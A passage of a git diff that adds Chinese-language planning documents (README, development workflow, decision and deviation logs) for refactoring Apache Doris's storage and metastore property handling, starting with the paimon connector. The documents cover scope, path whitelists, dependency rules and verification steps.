文件**(DefaultConnectorContext + FileSystemPluginManager,均纯新增),白名单已 +1。 +- ⚠️ **R-001 等价性**:fe-filesystem 为新事实源,较 fe-property 略**超集**(S3 role/anon;OSS/COS/OBS endpoint 无条件);T1 须钉常见路径全等 + 记超集差异。 + +--- + +## 最近动态(最近 7 天) +- 2026-06-17 **进入 Implement(范围 P0+P1 获批)**;**P0-T01 ✅**(4-agent recon 取证三套 StorageProperties + 连接器 seam):(1) F1 等价性=非阻塞(fe-filesystem 与 paimon 现 fe-property 路常见静态凭据键全等、为超集);(2) F2 可行性=阻塞(无 bind-all 入口,证伪白名单「唯一 fe-core 改动」)→ **DV-001**;用户定 **机制 A** → **D-009**(fe-core `FileSystemPluginManager.bindAll` + `getStorageProperties()` 经 `getOrigProps()`,白名单 +1)。已回写设计/WORKFLOW/decisions/risks/tasks。 +- 2026-06-17 **3 设计点定稿(D-006/7/8)**(3-agent recon + 直读复核):**D-006** MetaStore 后端用 `MetaStoreProvider.supports()` 自识别 + ServiceLoader(镜像 `FileSystemProvider`),api 层**去掉** `MetaStoreType` 枚举;**D-007** Kerberos 抽**顶层中立叶子 `fe-kerberos`**(否决 fe-connector-auth:破 fe-filesystem↛fe-connector gate + fe-common 层级倒挂),分 P3a(paimon-local)/P3b(全量去重 follow-up);**D-008** vended 边界=连接器只抽取、fe-core 单点归一(现状已符合)。设计文档 §0/§2.3/§3.1/§3.2/§3.3/§3.5/依赖图已更新。 +- 2026-06-17 调研完成(current state:paimon metastore 已与 fe-core 解耦、仅剩 storage 对 fe-property 一条边;三套同名 StorageProperties;fe-core metastore 28 文件 3624 LOC 矩阵;kerberos 三处实现)。 +- 2026-06-17 设计定稿 + 4 决策(①新建 metastore-api/spi ②混合去重 ③fe-core 绑定下发 typed storage ④复用 @ConnectorProperty)。 +- 2026-06-17 范围收窄(用户):纯新增/迁移、只动 paimon、不删 fe-core 两包、不动其它连接器、fe-property 不物理删。 +- 2026-06-17 建立本跟踪目录 + 开发流程(WORKFLOW.md)+ 任务清单(13 tasks)。 + +--- + +## 关键链接 +- 设计:[`../designs/metastore-storage-property-refactor-design-2026-06-17.md`](../designs/metastore-storage-property-refactor-design-2026-06-17.md) +- 背景(fe-filesystem StorageProperties 现状评审):[`../reviews/fe-filesystem-storage-spi-review-2026-06-17.md`](../reviews/fe-filesystem-storage-spi-review-2026-06-17.md) +- 流程:[`WORKFLOW.md`](./WORKFLOW.md) | 任务:[`tasks.md`](./tasks.md) | 决策:[`decisions-log.md`](./decisions-log.md) diff --git a/plan-doc/metastore-storage-refactor/README.md b/plan-doc/metastore-storage-refactor/README.md new file mode 100644 index 00000000000000..59921abff76868 --- /dev/null +++ b/plan-doc/metastore-storage-refactor/README.md @@ -0,0 +1,68 @@ +# 子项目:属性体系重构(Storage→fe-filesystem / MetaStore→fe-connector SPI,paimon 优先) + +> 本目录是**该子项目唯一权威跟踪源**。它隶属于上层 connector 迁移项目(见 `../README.md`),并**沿用**其文档机制(决策/偏差/风险区分、ID 规则、维护规则),仅作范围裁剪与本项目特化。 +> 任何讨论、评审、PR 描述都应引用本目录文件。 + +--- + +## 〇、入口(看了就懂) + +| 我想做的事 | 看哪个文件 | +|---|---| +| **了解为什么做、目标架构、SPI/API 设计、接口签名** | [`../designs/metastore-storage-property-refactor-design-2026-06-17.md`](../designs/metastore-storage-property-refactor-design-2026-06-17.md) ★(设计权威)| +| **本项目怎么开发:流程 / 单任务循环 / 守门 / 验证 / 提交** | [`WORKFLOW.md`](./WORKFLOW.md) ★ | +| **现在做到哪一步 / 下一步是什么** | [`PROGRESS.md`](./PROGRESS.md) ★ | +| **具体任务清单(Pn-Tnn)+ 验收** | [`tasks.md`](./tasks.md) | +| **做过哪些决策、为什么** | [`decisions-log.md`](./decisions-log.md) | +| **实施中发现原计划不可行处** | [`deviations-log.md`](./deviations-log.md) | +| **风险与缓解** | [`risks.md`](./risks.md) | +| **接管上次 session** | [`HANDOFF.md`](./HANDOFF.md) ★ | + +--- + +## 一、目录结构 + +``` +plan-doc/metastore-storage-refactor/ +├── README.md ← 本文件(子项目入口) +├── WORKFLOW.md ← 本项目开发流程(核心:阶段模型 / 单任务循环 / 守门 / 验证 / 维护规则) +├── PROGRESS.md ← 仪表盘(人类+agent 入口必读) +├── tasks.md ← Pn-Tnn 任务清单 + 验收 + 状态 +├── decisions-log.md ← 决策 ADR,append-only(本项目内编号) +├── deviations-log.md ← 实施偏差,append-only(本项目内编号) +├── risks.md ← 风险滚动状态 +└── HANDOFF.md ← Session 间接力(每次结束覆盖) + +设计正文不放这里 → 在 ../designs/metastore-storage-property-refactor-design-2026-06-17.md +``` + +--- + +## 二、本项目范围(红线,来自用户 2026-06-17) + +- ✅ **只做**:新建 `fe-connector-metastore-api/spi`(仅 paimon 用到的后端,后端用 `MetaStoreProvider` 自识别、无枚举 — D-006);新增 `ConnectorContext.getStorageProperties()` 让 fe-core 下发已绑定 `StorageProperties`;改造 **paimon** 连接器(storage 走 fe-filesystem-api、metastore 走新 SPI、vended 仍走 `ctx.vendStorageCredentials` — D-008);断开 paimon→`fe-property` 依赖边;**新建顶层叶子 `fe-kerberos` + paimon HMS kerberos facts 走它(P3a,D-007)**。 +- 🚫 **不做**:不删 fe-core `datasource.property.{storage,metastore}` 任何类;不动 hive/hudi/iceberg/es/jdbc/mc/trino;**不动 fe-common / fe-filesystem-hdfs 既有 kerberos 路径**(其收口 = P3b follow-up);fe-property 不物理删(仅变孤儿);不收紧 import gate。 +- 🔭 **范围外(后续)**:其它连接器迁移、**P3b**(fe-common + fe-filesystem-hdfs 收口到 fe-kerberos 全量去重)、终态删 fe-core 两包 + 删 fe-property + 收 gate。 + +详见设计文档 §0.1。 + +--- + +## 三、与上层 plan-doc 的关系 + +- **文档机制**沿用 `../README.md`(§3 决策vs偏差vs风险、§4 维护规则、§5 防腐、§6 不在范围)。 +- **编号空间独立**:本目录的 `D-/DV-/R-` 与 `Pn-Tnn` 仅在本子项目内有效,**不**与 `../decisions-log.md` 等共享编号(避免跨文件碰撞)。各 log 顶部已注明。 +- **Agent 接力**沿用 `../AGENT-PLAYBOOK.md` 的 context/subagent/handoff 规范;本目录 `HANDOFF.md` 是本子项目的接力点。 + +--- + +## 四、给后来者 + +**人类**:先读设计文档 §0/§2/§3(10 min)→ 看 `PROGRESS.md`(2 min)→ 要动手再读 `tasks.md` 对应 task + `WORKFLOW.md` 单任务循环。 + +**LLM agent(强制顺序)**: +1. Read `PROGRESS.md`(全局状态) +2. Read `HANDOFF.md`(上次留言) +3. Read `WORKFLOW.md`(怎么干) +4. 如 HANDOFF 指定当前 task,Read `tasks.md` 中该 task 块 +5. 一句话复述确认("上次完成 X,下一步 Y,对吗?")→ 用户确认后开始 diff --git a/plan-doc/metastore-storage-refactor/WORKFLOW.md b/plan-doc/metastore-storage-refactor/WORKFLOW.md new file mode 100644 index 00000000000000..f05ffdef299b49 --- /dev/null +++ b/plan-doc/metastore-storage-refactor/WORKFLOW.md @@ -0,0 +1,146 @@ +# 开发流程(仅适用于本子项目) + +> 派生自 `../README.md` 的开发设计原则(文件职责矩阵 / 决策vs偏差 / ID 规则 / 维护规则 / 防腐 / 不在范围),并融合本仓库使用的工作流技能:`research-design-workflow`、`step-by-step-fix`、`test-driven-development`、`verification-before-completion`。 +> 一句话:**研究/设计已完成 → 进入「逐任务、测试先行、独立提交、严守红线、文档同步」的实现循环。** + +--- + +## 1. 阶段模型(research-design-workflow) + +| 阶段 | 状态 | 产物 | +|---|---|---| +| Research(取证) | ✅ 完成 | 8-agent 调研 + grep 复核(见设计文档附录 A) | +| Design(设计) | ✅ 完成 | `../designs/metastore-storage-property-refactor-design-2026-06-17.md`(4 决策 + 目标架构 + SPI + 有序 TODO) | +| **Implement(实现)** | ⏳ 待批准后开始 | 按 `tasks.md` 逐 task 落地,每 task 独立提交 | +| Verify(验证) | 每 task 内联 | UT / checkstyle / docker;T1/T2 等价性测试 | +| Refine(精修) | 每阶段末 | review + 简化,必要时回写设计/记偏差 | + +**禁止**:未经用户批准 `tasks.md` 的 TODO 列表,不开始 Implement(research-design-workflow 要求 "Get approval before implementation")。 + +--- + +## 2. 单任务开发循环(step-by-step-fix + TDD) + +每个 `Pn-Tnn` 严格走以下 8 步,**一个 task = 一个独立 commit**: + +1. **认领**:在 `tasks.md` 把该 task 状态 `⬜→🚧`,在 `HANDOFF.md` 记"正在做 Pn-Tnn"。 +2. **微设计**(如该 task 有不确定点):在 task 块"备注"写 1–3 行实现要点;若偏离设计文档 → 先记 `deviations-log.md`(见 §6)。 +3. **测试先行(RED)**:先写/改测试表达*意图*(不是行为镜像)——尤其 T1/T2 等价性(新产物 == 旧产物的 key/value)。确认测试 RED。 +4. **实现(GREEN)**:最小改动让测试通过。匹配既有代码风格。 +5. **守门核对**(§4 红线):`git diff --name-only` 必须落在**白名单路径**内;依赖方向不破。 +6. **验证**(§5):FE 编译 + checkstyle + 相关 UT 全绿;必要时 docker paimon。**"完成"前必须有命令输出佐证**(verification-before-completion)。 +7. **提交**:`[Pn-Tnn] `,结尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。先在非默认分支。 +8. **同步文档**:`tasks.md` 状态 `🚧→✅`(加日期 + commit);更新 `PROGRESS.md`;如产生决策/偏差/风险,记对应 log;更新 `HANDOFF.md`。 + +> 卡住(blocker)时:在 task 块记 blocker 备注,停下来向用户澄清,**不要猜**(项目 CLAUDE.md Rule 1)。 + +--- + +## 3. 任务编号与依赖 + +- Task ID:`Pn-Tnn`(如 `P1-T03`)。**永不复用/重排**,删除也留占位标 `[deleted]`。 +- 阶段:`P0` 准备 / `P1` storage 收口 / `P2` metastore SPI。范围外阶段不在本项目。 +- 依赖:task 块标注前置(如 `P1-T03` 依赖 `P1-T01,P1-T02`)。可并行的标 `∥`。 + +--- + +## 4. 红线守门(本项目特有,每次提交前核对) + +### 4.1 路径白名单(`git diff --name-only` 只允许落在) +``` +fe/fe-connector/fe-connector-metastore-api/** (新建) +fe/fe-connector/fe-connector-metastore-spi/** (新建) +fe/fe-connector/fe-connector-paimon/** (改造) +fe/fe-connector/fe-connector-spi/** (仅 ConnectorContext 新增方法) +fe/fe-core/src/main/java/.../connector/DefaultConnectorContext.java (仅新增 getStorageProperties) +fe/fe-core/src/main/java/.../fs/FileSystemPluginManager.java (仅新增 bindAll;D-009/DV-001) +fe/fe-connector/pom.xml ; fe/pom.xml (仅新增模块声明) +plan-doc/metastore-storage-refactor/** (本跟踪目录) +``` +**禁止**出现的路径(出现即停、回滚或记偏差): +- `fe/fe-core/src/main/java/.../datasource/property/storage/**`(fe-core 旧 storage 包,保持不动) +- `fe/fe-core/src/main/java/.../datasource/property/metastore/**`(fe-core 旧 metastore 包,保持不动) +- `fe/fe-connector/fe-connector-{hive,hudi,iceberg,es,jdbc,maxcompute,trino}/**`(其它连接器,不动) +- `fe/fe-property/**` 的删除(本次只断 paimon 依赖边,不删模块) + +### 4.2 依赖方向(CI gate + 人工核对) +- `fe-connector-*` 不得 import `org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`(`tools/check-connector-imports.sh`)。 +- paimon 模块 `grep -r 'org.apache.doris.property'` 应在 P1 后归零;`grep -r 'org.apache.doris.datasource'` 恒为 0。 +- `fe-filesystem-*` 不得 import fe-connector / fe-core。 +- 新模块 `fe-connector-metastore-api/spi` 只可依赖 `fe-foundation` + `fe-filesystem-api`(+ `fe-connector-api/spi`)。 + +### 4.3 不变量(设计文档 §5,改动不得破坏) +- metastore 不持有 storage 字段;storage 作入参传入(`parse(raw, storageList)`)。 +- storage 叠加保序:canonical 在前、`paimon.*/fs./dfs./hadoop.` 覆盖在后(last-write-wins)。 +- HMS Kerberos 条件键在 storage 叠加**之后**施加。 +- 特权/RPC(Kerberos doAs、hive.conf.resources、vended 绑定、thrift `TS3StorageParam`)留 fe-core 经 `ConnectorContext`。 + +--- + +## 5. 验证标准 + +### 5.1 每 task 必跑 +- FE 编译该模块(maven **用绝对 `-f`**;paimon 模块需 `-am package -Dassembly.skipAssembly=true`,因 shade jar 携带 HiveConf)。 +- checkstyle 0 违规(用 `fe-code-style` 技能)。 +- 相关 UT 全绿(**注意 maven build-cache 会跳过 surefire → BUILD SUCCESS ≠ 测试跑了**;用 `-Dmaven.build.cache.enabled=false` 确保真跑)。 +- 后台 task 的退出码以输出里的 `BUILD SUCCESS/FAILURE` 行为准(非 echo 的 exit code)。 + +### 5.2 阶段验收测试(强制,设计文档 §5) +- **T1**(P1):S3/OSS/COS/OBS/HDFS 代表输入下,新 `toHadoopConfigurationMap()`/`toBackendProperties().toMap()` 与 fe-core 旧 `getHadoopStorageConfig()`/`getBackendConfigProperties()` 的 key/value **全等**(含默认调优值分叉 S3=50/3000/1000 vs OSS/COS/OBS=100/10000/10000)。 +- **T2**(P2):HMS(simple/kerberos)/DLF/REST/JDBC/filesystem 下,共享 `*MetastoreBackend.parse` 产物与 fe-core 旧 `Paimon*MetaStoreProperties` 一致(HiveConf key 集 + ParamRules 报错文案)。 +- **T3**:依赖图守门(CI gate + 可加 ArchUnit)。 +- **T4**:docker `enablePaimonTest=true` 跑 paimon 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS。 + +### 5.3 docker/e2e 说明 +- T4 是 docker-gated;若本次环境不部署,**明确标注"未跑 e2e"**(项目 CLAUDE.md Rule 12 失败/跳过要发声),不得把"编译过"当"验证过"。 + +--- + +## 6. 决策 / 偏差 / 风险(沿用 ../README §3) + +- **决策(D-NNN)**:事前选择,进 `decisions-log.md` 顶部。本项目 4 个核心决策已记 D-001..D-004,范围决策 D-005。 +- **偏差(DV-NNN)**:原设计落地中发现不可行/不必要,**事后**记 `deviations-log.md`,并回写设计文档对应节加 `(DV-NNN 修订)`。**禁止 silently 改设计**。 +- **风险(R-NNN)** vs **问题(Issue)**:可能发生→`risks.md` 滚动;已发生→记在 task 块 blocker。 +- 编号仅本子项目内有效(与上层 plan-doc 独立)。 + +--- + +## 7. 文档维护规则(沿用 ../README §4,裁剪) + +| 触发 | 动作 | +|---|---| +| 完成一个 task | `tasks.md` 状态翻转 + 日期/commit;更新 `PROGRESS.md`;阶段日志追加一行 | +| 产生新决策 | 先写 `decisions-log.md` 顶部分配 D-NNN;如改设计则回写并加脚注 | +| 发现偏差 | 先写 `deviations-log.md`(DV-NNN:原计划位置/为何不可行/新方案/影响);再改设计 | +| 每次 session 结束 | 覆盖更新 `HANDOFF.md`(完成了什么 / 下一步 / 未决) | +| 每个 commit | 第一行 `[Pn-Tnn] `;merge 后立即按上面流程更新状态 | + +--- + +## 8. 不在范围(沿用 ../README §6) + +本流程**不**涵盖:代码评审(GitHub PR)、缺陷管理(Issues)、CI 状态(Actions)、工时/KPI。文档只追踪"本子项目的设计与进度",不追踪人。 + +--- + +## 9. 实现顺序建议(来自设计文档 §4) + +``` +P0(准备,可与 P1 并行起步) + └ P0-T01 确认 fe-filesystem-api 已够用 ∥ P0-T02 fe-core 绑定入口 + +P1(paimon storage 收口;纯新增/迁移) + P1-T01 ConnectorContext.getStorageProperties() ← 解锁 fe-connector→fe-filesystem-api 边 + P1-T02 DefaultConnectorContext 实现(限 paimon 路径) [依赖 P1-T01,P0-T02] + P1-T03 PaimonCatalogFactory storage 改走 api [依赖 P1-T01] + P1-T04 PaimonScanPlanProvider BE 凭据改走 api [依赖 P1-T01] + P1-T05 断开 paimon→fe-property 依赖边 [依赖 P1-T03,T04] + P1-T06 验证(UT + docker 5 flavor + T1) [依赖 P1-T02..T05] + +P2(metastore SPI + paimon adapter;纯新增/迁移) + P2-T01 新建 fe-connector-metastore-api + P2-T02 新建 fe-connector-metastore-spi(共享后端解析器) [依赖 P2-T01] + P2-T03 paimon adapter 改走共享解析器 [依赖 P2-T02] + P2-T04 paimon pom + gate 核对 [依赖 P2-T03] + P2-T05 验证(UT + docker 5 flavor + T2 + vended + kerberos) [依赖 P2-T03,T04] +``` diff --git a/plan-doc/metastore-storage-refactor/decisions-log.md b/plan-doc/metastore-storage-refactor/decisions-log.md new file mode 100644 index 00000000000000..0881ad299d4e6b --- /dev/null +++ b/plan-doc/metastore-storage-refactor/decisions-log.md @@ -0,0 +1,62 @@ +# 决策日志(ADR,append-only,时间倒序) + +> 编号 `D-NNN` **仅在本子项目内有效**,与上层 `../decisions-log.md` 独立。 +> 新决策写在顶部。修改设计文档某节时,在该节加 `(D-NNN)` 脚注。 + +--- + +## D-009 — bind-all 机制 + 白名单 +1(FileSystemPluginManager)(应对 DV-001) +- **日期**:2026-06-17 | **决策者**:用户(应对 P0-T01 证伪 P0-1 预期) +- **内容**:实现 `ConnectorContext.getStorageProperties()`(返回 fe-filesystem typed `StorageProperties`)所需的 raw map → `List` 绑定,落在 fe-core `FileSystemPluginManager` 新增 additive `public List bindAll(Map)`(镜像现有 `createFileSystem` 的 provider 循环,但用 `provider.bind(props)` 全量收集所有 `supports()` 命中者,而非首个命中 `create`)。`DefaultConnectorContext.getStorageProperties()` 调它;raw map 经现有 `storagePropertiesSupplier` 值的 `getOrigProps()` 取(fe-core `ConnectionProperties` 公有 getter),**不改构造点**(`PluginDrivenExternalCatalog` 零改动)。 +- **理由**:守 D-003「连接器只见 fe-filesystem-api」架构(否决 C「ctx 返回 Map」=放弃该目标边);bindAll 放 fe-core(非 fe-filesystem-spi 静态)契合设计 §2.1「fe-core 用 providers 全量绑定」且能见 directory 插件(否决 B)。fe-core 改动 = `DefaultConnectorContext` + `FileSystemPluginManager` 两文件、均纯新增。 +- **影响**:WORKFLOW §4.1 白名单 +`FileSystemPluginManager.java`(仅新增 bindAll);risks R-004 改「唯一」为「两处 fe-core 新增」;设计 §4 P0-1/P0-2 回写(+DV-001 脚注);tasks P0-T02/P1-T02。**fe-core 旧 storage 包仍零改动**(bindAll 用 fe-filesystem providers,不碰 `datasource.property.storage`)。 + +## D-008 — Vended creds 边界:连接器只「抽取」,fe-core 单点「归一」 +- **日期**:2026-06-17 | **决策者**:用户 +- **内容**:vended creds 处理边界 = **连接器只负责 SDK 特定的原始 token 抽取**(paimon 已落地于 `PaimonScanPlanProvider.extractVendedToken(table)`,从活的 paimon SDK 表对象抠出任意 shape 的 `s3.*`/`oss.*` token);**raw-token → 统一 BE map** 的归一(`CredentialUtils.filterCloudStorageProperties` + `StorageProperties.createAll`(provider 重绑、派生 region/endpoint/调优默认)+ `getBackendPropertiesFromStorageMap` → `AWS_ACCESS_KEY/SECRET_KEY/TOKEN/ENDPOINT/REGION`)**仍由 fe-core `ConnectorContext.vendStorageCredentials(rawToken)` 单点实现**。fe-core 旧 `Paimon/IcebergVendedCredentialsProvider` 的抽取逻辑后续随各连接器迁移正式下沉到连接器(paimon 已下沉),本次不删 fe-core 旧类(D-005)。 +- **理由**:raw-token→BE-map 必须套**后端特定**默认值(region/endpoint 推导、S3=50/3000/1000 vs OSS/COS/OBS=100/10000/10000 调优分叉),需 storage providers(ServiceLoader 发现);而连接器按 D-003 **只见 fe-filesystem-api 接口、不持有 providers**,物理上无法独立完成全程归一。延续 D-003「动态/provider 发现留 fe-core」的精确边界:连接器最轻、归一单点、无漂移。**备选 B(放宽红线让连接器依赖 fe-filesystem-spi/providers 自做端到端)被否**:加重连接器 classpath + 破坏「fe-connector 仅依赖 fe-filesystem-api」红线。 +- **影响**:设计 §2.3(细化边界);tasks `P1-T04` 已符合(vended 路径不动,仍走 `ctx.vendStorageCredentials`),**无新增 task**;为后续 hive/iceberg 迁移确立统一 vended 模式。 + +## D-007 — Kerberos 抽到新叶子模块 fe-kerberos(单一真相源) +- **日期**:2026-06-17 | **决策者**:用户 +- **内容**:新建叶子模块 **`fe-kerberos`**(依赖**仅** hadoop-auth/hadoop-common;把唯一外部依赖 trino `KerberosTicketUtils` 用 JDK `javax.security.auth.kerberos` 替掉),把 fe-common `org.apache.doris.common.security.authentication.*` 整套搬入作**唯一真相源**;`fe-filesystem-hdfs` **删掉自有的** `KerberosHadoopAuthenticator`、改依赖 fe-kerberos;统一两个打架的 `HadoopAuthenticator` 接口(fe-common 用 `PrivilegedExceptionAction` vs fe-filesystem-spi 用 `IOCallable`)为单接口 + 消费侧 adapter。`fe-common`/`fe-core`/`fe-filesystem-*`/`fe-connector-*` 共用。`fe-kerberos` **置于顶层**(与 `fe-foundation`/`fe-common` 平级的中立叶子),无环。 +- **归属/命名(用户 2026-06-17 二次确认)**:**否决** `fe-connector-auth`(置于 fe-connector 组)——会破坏两条规则:(1) `fe-filesystem-* ──╳──► fe-connector` gate(fe-filesystem-hdfs 无法依赖它删除自有副本);(2) `fe-common`(低层)反向依赖 fe-connector 子模块=层级倒挂。故必须是**顶层中立叶子**才能被 fe-filesystem-hdfs + fe-common 共用(=满足原始需求「HMS 与 HDFS 都能用」)。**模块名定 `fe-kerberos`**(用户 2026-06-17 确认)。 +- **理由**:现状 kerberos **三处实现**——(1) fe-common `security.authentication.*`(fe-core/HMS/HDFS 用);(2) fe-filesystem-hdfs **自抄一份** `KerberosHadoopAuthenticator`(为避免依赖 fe-common,一年前拷贝、TGT 刷新可能已漂移);(3) paimon 手抄 HMS 的 kerberos HiveConf 键 + 回调 `ctx.executeAuthenticated`。改一处要改三处。auth 类 import 干净(仅 JDK/hadoop/log4j/commons/guava + 1 个 trino),fe-common 不依赖 fe-core → 抽取无阻力;`fe-foundation` 现为纯净(零 hadoop)的 `@ConnectorProperty` 叶子,**不应**被 hadoop 污染(故否「折进 fe-foundation」);也否「fe-filesystem/fe-connector 直接依赖较重的 fe-common」。 +- **范围(分两步,用户 2026-06-17 确认)**:(a) **P3a 纳入本次** = 先建 `fe-kerberos` + 让 **paimon** 的 HMS kerberos facts 走它(paimon-local、纯新增,**不碰** fe-common/fe-filesystem-hdfs 既有路径,符合 D-005);(b) **P3b = follow-up(本次不做)** = 全量去重(删 fe-filesystem-hdfs 副本、fe-common 重指向 fe-kerberos、统一两个 `HadoopAuthenticator` 接口),与 hive/iceberg 迁移同批——此步改 fe-common + fe-filesystem-hdfs,超出 D-005,故独立。 +- **影响**:设计 §3.5(新增 Kerberos 节)+ 依赖图(加 fe-kerberos 叶子);tasks 新增 P3;risks 补「kerberos 三处漂移」项。 + +## D-006 — MetaStore 后端「类型」用 Provider 自识别,api 层不放 per-backend 枚举 +- **日期**:2026-06-17 | **决策者**:用户(修正 D-001/设计 §3.1 初版的 `MetaStoreType` 枚举) +- **内容**:`fe-connector-metastore-api` 的 `MetaStoreProperties` 接口**不放 per-backend `MetaStoreType` 枚举**;后端标识用 **`String providerName()`**,横切行为用**能力方法**(如 `boolean needsStorage()` / `needsVendedCredentials()`)表达。新增 `fe-connector-metastore-spi` 的 **`MetaStoreProvider

      ` SPI**(`boolean supports(Map)` 自识别 + `bind(raw, storageList)`),经 `META-INF/services` + ServiceLoader 发现,**镜像 `FileSystemProvider`**。新增后端(Glue/S3Tables/自定义)= 新模块 + 新 provider + 一行 services 文件,**api/spi 零改动、无中心 switch**。唯一旧消费者 `VendedCredentialsFactory:61` 的 `getType()` switch 用能力方法替代。 +- **理由**:把 per-backend 枚举放进 api 会**原样继承**旧 `MetastoreProperties.Type` 的脆性(每加后端改 api 枚举 + 找全散落 switch、漏一个无编译期报错);fe-filesystem 已用 provider 模式干净解决同一问题,连 `FileSystemType` per-backend 枚举顶上都挂着官方「加类型要改多处、易错」的反模式 TODO。**高层 category 枚举(如 `StorageKind`)可留**(封闭小集 + 承载横切行为),但 metastore 当前无此需要,能力方法足矣。 +- **影响**:设计 §3.1(重写 type() 部分为 provider 模型)/ §3.2(加 `MetaStoreProvider` SPI + ServiceLoader);tasks `P2-T01` 改写(去枚举、加 provider);**修正 D-001** 措辞中的「MetaStoreType 枚举」。 + +## D-005 — 本次任务范围:纯新增/迁移,只动 paimon +- **日期**:2026-06-17 | **决策者**:用户 +- **内容**:本次任务 **不删除** fe-core `datasource.property.{storage,metastore}` 任何类;**不修改** hive/hudi/iceberg/es/jdbc/mc/trino 连接器;`fe-property` 仅断开 paimon 依赖边(变孤儿),**不物理删**;import gate 不收紧。Phase 3+ 及 fe-core 两包的最终删除属范围外(后续全连接器迁完再做)。 +- **理由**:保持改动外科化、可回滚;隔离 paimon 的迁移风险,不波及在用的 hive/hudi/iceberg。 +- **影响**:设计文档 §0.1 / §4(Phase 1/2 改为 additive、删除 Phase 3+ 与 fe-core 删除步骤)/ §6。 + +## D-004 — typed MetaStore 属性复用 fe-foundation @ConnectorProperty 绑定 +- **日期**:2026-06-17 | **决策者**:用户 +- **内容**:新 MetaStore 属性模型用 `@ConnectorProperty` + `ConnectorPropertiesUtils` 注解绑定(别名优先级/required/sensitive/matchedProperties 全免费),镜像 fe-filesystem StorageProperties 做法。 +- **理由**:消除 paimon 手抄的 `String[]` 别名数组 + `firstNonBlank`;单一真相源。 +- **影响**:设计 §3.2(typed holder)。 + +## D-003 — fe-core 绑定 Storage,经 ConnectorContext 下发已解析的 StorageProperties +- **日期**:2026-06-17 | **决策者**:用户(修正 agent 初版"混合 Option C") +- **内容**:CREATE CATALOG 入口在 fe-core;fe-core 用 fe-filesystem(全量+providers)绑定 `StorageProperties`,经 `ConnectorContext.getStorageProperties(): List`(fe-filesystem-api 类型)传给连接器;连接器只见 api 接口,调 `toHadoopProperties()/toBackendProperties()`。动态/RPC(vended creds、URI 归一、thrift `TS3StorageParam`)留 fe-core 经 ConnectorContext 委托。 +- **理由**:provider 发现(ServiceLoader)集中 fe-core;连接器 classpath 无需 providers、只依赖 fe-filesystem-api 接口——精确满足"fe-connector 仅依赖 fe-filesystem-api";比"连接器自调静态门面"(agent 初版 Option C)更干净。 +- **影响**:设计 §2 / §3.2 / §4 P1-1,P1-2。**取代** agent 初版的静态门面方案(无需给 fe-filesystem-api 加 `buildObjectStorageHadoopConfig` 等价静态门面)。 + +## D-002 — 去重策略:混合(共享后端 fact 解析器 + 薄 per-connector adapter) +- **日期**:2026-06-17 | **决策者**:用户 +- **内容**:HMS/DLF/Glue/REST/JDBC 的"连接事实解析器"在 `fe-connector-metastore-spi` 实现**一次**(含 JDBC DriverShim);每个连接器只写薄 catalog adapter 消费 facts 建各自 SDK catalog。 +- **理由**:最大化去重(HMS 后端现被复制约 4 次、DLF 8-key 块 3 次、DriverShim 2 次),又不把引擎 SDK 塞进共享层。 +- **影响**:设计 §3.2 / §3.3。 + +## D-001 — 新建 fe-connector-metastore-api + fe-connector-metastore-spi 模块对 +- **日期**:2026-06-17 | **决策者**:用户 +- **内容**:MetaStore Property SPI/API 放在新建的模块对,依赖 fe-foundation + fe-filesystem-api,镜像 fe-filesystem 的 api/spi 拆分;不折叠进现有 fe-connector-api(其极简,仅 fe-thrift provided)。 +- **理由**:metastore 模型需要 @ConnectorProperty 绑定(fe-foundation)+ StorageProperties 入参(fe-filesystem-api),不应污染 fe-connector-api 的消费契约层。 +- **影响**:设计 §0 / §3.1 / §3.2。 diff --git a/plan-doc/metastore-storage-refactor/deviations-log.md b/plan-doc/metastore-storage-refactor/deviations-log.md new file mode 100644 index 00000000000000..6c76896f598f28 --- /dev/null +++ b/plan-doc/metastore-storage-refactor/deviations-log.md @@ -0,0 +1,21 @@ +# 偏差日志(DV,append-only,时间倒序) + +> 编号 `DV-NNN` **仅在本子项目内有效**,与上层 `../deviations-log.md` 独立。 +> 规则(沿用 ../README §4.3):原设计在落地中发现不可行/不必要时,**先**在此顶部记录,**再**改设计文档;禁止 silently 改设计。 +> 每条格式:`DV-NNN`、日期、原计划位置(设计 §x / task Pn-Tnn)、为何不可行、新方案、影响范围。 + +--- + +## DV-001 — P0-1 预期「fe-filesystem-api 已够用、无需门面」被证伪:缺 raw map → List 的 bind-all 入口 +- **日期**:2026-06-17 | **原计划位置**:设计 §4 P0-1 / §2.1 / 决策 D-003;task P0-T01;WORKFLOW §4.1 路径白名单("唯一 fe-core 改动 = DefaultConnectorContext")。 +- **为何不可行(取证)**: + - fe-filesystem `org.apache.doris.filesystem.properties.StorageProperties` 是**纯接口、无静态工厂**(无 `createAll`)。绑定靠各 `FileSystemProvider.bind(Map)`。 + - 仓内**不存在**任何「raw map → `List`」聚合入口:`FileSystemPluginManager.providers` 私有,唯一出口是**首个命中**的 `createFileSystem`(返回 `FileSystem`,不是 StorageProperties,且非全量);`FileSystemFactory.getProviders()` 包级私有且仅 ServiceLoader。 + - `DefaultConnectorContext` 当前**只持有 fe-core typed map 的 supplier**(`Map`),不持有 raw map;fe-filesystem 是**另一族** StorageProperties。raw map 可经现有 supplier 值的 `getOrigProps()`(fe-core `ConnectionProperties` 公有 getter)取回,**无需改构造点**;但**绑定步骤**仍需新代码。 + - 结论:实现 `getStorageProperties()`(返回 fe-filesystem 类型)**至少需要在 DefaultConnectorContext 之外再加一个 additive `bindAll(...)`**(fe-core `FileSystemPluginManager` 或 fe-filesystem-spi),无法塞进 `DefaultConnectorContext` 单文件 → 白名单需最小扩张。 + - 另:F1 等价性——fe-filesystem `toHadoopConfigurationMap()` 与 paimon 现走的 fe-property `buildObjectStorageHadoopConfig` 在**静态凭据常见路径全等**(COS/OSS/OBS 的 jindo/cosn/obs 块都在);fe-filesystem 为**超集**(S3 assume-role/anon 分支额外键 + OSS/COS/OBS endpoint/region 无条件 vs 懒发)。非阻塞,但确认 fe-filesystem 为新事实源,T1 钉常见路径全等 + 记超集差异。 +- **新方案(用户 2026-06-17 定向 A,记 D-009;已回写)**:在 fe-core `FileSystemPluginManager` 加 additive `public List bindAll(Map)`(镜像 `createFileSystem` 的 provider 循环,但 `bind` 全量收集而非首个命中 `create`);`DefaultConnectorContext.getStorageProperties()` 调它,raw map 经现有 supplier 值的 `getOrigProps()` 取(不碰构造点)。已回写:设计 §4 P0-1/P0-2、WORKFLOW §4.1 